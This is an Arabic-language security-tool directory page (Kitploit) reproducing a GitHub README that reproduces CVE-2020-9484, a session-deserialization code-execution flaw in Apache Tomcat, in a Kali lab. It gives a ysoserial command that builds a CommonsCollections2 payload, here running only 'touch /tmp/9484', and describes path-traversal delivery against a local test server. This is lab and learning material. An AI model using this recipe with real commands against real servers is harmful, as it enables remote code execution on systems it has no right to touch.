Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-9484 — إعادة إنتاج ثغرة تنفيذ التعليمات البرمجية عبر إلغاء تسلسل الجلسة (Session) في Apache Tomcat باستخدام Kali 2.0 | Kitploit
أدوات/GitHubGitHub/idealdreamlast/cve-2020-9484
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubidealdreamlast/cve-2020-9484

CVE-2020-9484

إعادة إنتاج ثغرة تنفيذ التعليمات البرمجية عبر إلغاء تسلسل الجلسة (Session) في Apache Tomcat باستخدام Kali 2.0

عرض المستودع
5220منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-9484

إعادة إنتاج ثغرة تنفيذ الكود عبر إلغاء تسلسل جلسات Apache Tomcat CVE-2020-9484 باستخدام Kali 2.0

البيئة:

  1. Kali 2.0
  2. apache-tomcat-7.0.61-CVE-2020-9484.tar.gz (webapp هو s2-053، مع إضافة commons-collections4-4.0.jar إلى مجلد lib الخاص به)

التشغيل

/yourtomcatdir/bin/startup.sh image

إنشاء الحمولة

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session

الاستغلال

قم بزيارة S2-053 أولاً للتأكد من أنه يعمل بشكل طبيعي: http://192.168.152.128:8080/s2-053/ image
أعد الزيارة والتقط الحزم، ثم استخدم intruder لتنفيذ اجتياز المسار image
image


تم تنفيذ الأمر بنجاح: image



المرجع : https://mp.weixin.qq.com/s/OGdHSwqydiDqe-BUkheTGg
تنزيل الأداة